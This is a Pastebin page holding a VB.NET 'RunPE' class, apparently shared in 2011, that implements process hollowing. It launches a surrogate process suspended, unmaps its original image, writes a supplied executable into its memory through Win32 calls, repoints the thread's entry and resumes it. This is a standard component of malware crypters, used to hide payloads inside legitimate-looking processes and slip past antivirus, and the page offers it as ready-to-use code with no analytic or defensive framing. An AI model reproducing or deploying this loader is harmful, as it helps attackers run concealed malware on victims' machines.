API tools faq
paste
InfinityExistz

RunPE vb.net

InfinityExistz
Dec 1st, 2011
44
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 4.80 KB | None | 0 0
raw download clone embed print report
  1. Imports System.Runtime.InteropServices
  2. Imports System.Text
  3.  
  4. Public Class x86
  5.  
  6.     Private Shared ReadOnly prot() As Integer = {1, 16, 2, 32, 4, 64, 4, 64}
  7.  
  8.     <System.Security.SuppressUnmanagedCodeSecurity()> _
  9.     Private Class Win32
  10.  
  11.         <DllImport("kernel32")> Shared Function ResumeThread(ByVal hThr As IntPtr) As Integer
  12.         End Function
  13.  
  14.         <DllImport("kernel32")> Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, _
  15.           ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, _
  16.           ByVal creation As Integer, ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo() As Byte, _
  17.           ByVal pInfo() As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  18.         End Function 'WORKING
  19.  
  20.         <DllImport("kernel32")> Shared Function GetThreadContext(ByVal hThr As IntPtr, _
  21.           ByVal ctxt() As UInteger) As <MarshalAs(UnmanagedType.Bool)> Boolean
  22.         End Function 'WORKING
  23.  
  24.         <DllImport("kernel32")> Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, _
  25.           ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  26.         End Function
  27.  
  28.         <DllImport("ntdll")> Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
  29.         End Function 'WORKING
  30.  
  31.         <DllImport("kernel32")> Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, _
  32.           ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
  33.         End Function 'WORKING ON NON .NET APPS
  34.  
  35.         <DllImport("kernel32.dll", SetLastError:=True)> _
  36.         Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As System.UInt32, <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
  37.         End Function
  38.  
  39.         <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
  40.         Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
  41.         End Function
  42.  
  43.         <DllImport("kernel32")> Shared Function SetThreadContext(ByVal hThr As IntPtr, _
  44.         ByVal ctxt() As UInteger) As <MarshalAs(UnmanagedType.Bool)> Boolean
  45.         End Function
  46.     End Class
  47.  
  48.     Public Shared Sub RunPE(ByVal bytes() As Byte, ByVal surrogateProcess As String)
  49.         Dim offsetNtHeaders As Integer = BitConverter.ToInt32(bytes, 60)
  50.         Dim numberOfSections As Integer = BitConverter.ToInt16(bytes, offsetNtHeaders + 6)
  51.         Dim sizeOfHeaders As New IntPtr(BitConverter.ToInt32(bytes, offsetNtHeaders + 84))
  52.         Dim si(67) As Byte
  53.         Dim pi(3) As IntPtr
  54.         If Not Win32.CreateProcess(Nothing, New StringBuilder(surrogateProcess), Nothing, Nothing, _
  55.            False, 4, Nothing, Nothing, si, pi) Then Return
  56.         Dim ctxt(178) As UInteger
  57.         ctxt(0) = &H10002
  58.         Dim base, junk, addr As IntPtr
  59.         Dim res As Boolean
  60.         Dim junk2 As Integer
  61.         If Win32.GetThreadContext(pi(1), ctxt) Then
  62.             If Win32.ReadProcessMemory(pi(0), New IntPtr(ctxt(41) + 8), addr, New IntPtr(4), junk) Then
  63.                 If Win32.NtUnmapViewOfSection(pi(0), addr) = 0 Then
  64.                     base = Win32.VirtualAllocEx(pi(0), New IntPtr(BitConverter.ToInt32(bytes, offsetNtHeaders + 52)), _
  65.                     New IntPtr(BitConverter.ToInt32(bytes, offsetNtHeaders + 80)), 12288, 64)
  66.                     res = Win32.WriteProcessMemory(pi(0), base, bytes, sizeOfHeaders, junk)
  67.                     For i As Integer = 0 To numberOfSections - 1
  68.                         Dim sh(9) As Integer
  69.                         Buffer.BlockCopy(bytes, offsetNtHeaders + 248 + (i * 40), sh, 0, 40)
  70.                         Dim raw(sh(4) - 1) As Byte
  71.                         Buffer.BlockCopy(bytes, sh(5), raw, 0, raw.Length)
  72.                         res = Win32.WriteProcessMemory(pi(0), New IntPtr(base.ToInt32 + sh(3)), raw, New IntPtr(raw.Length), junk)
  73.                         res = Win32.VirtualProtectEx(pi(0), New IntPtr(base.ToInt32 + sh(3)), _
  74.                          New IntPtr(sh(2)), prot((sh(9) >> 29) And &H7), junk2)
  75.                     Next
  76.                     res = Win32.WriteProcessMemory(pi(0), New IntPtr(ctxt(41) + 8), BitConverter.GetBytes(base.ToInt32), _
  77.                     New IntPtr(4), junk)
  78.                     ctxt(44) = CType(base.ToInt32 + BitConverter.ToInt32(bytes, offsetNtHeaders + 40), UInteger)
  79.                     Win32.SetThreadContext(pi(1), ctxt)
  80.                 End If
  81.             End If
  82.         End If
  83.         Win32.ResumeThread(pi(1))
  84.     End Sub
  85.  
  86. End Class
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!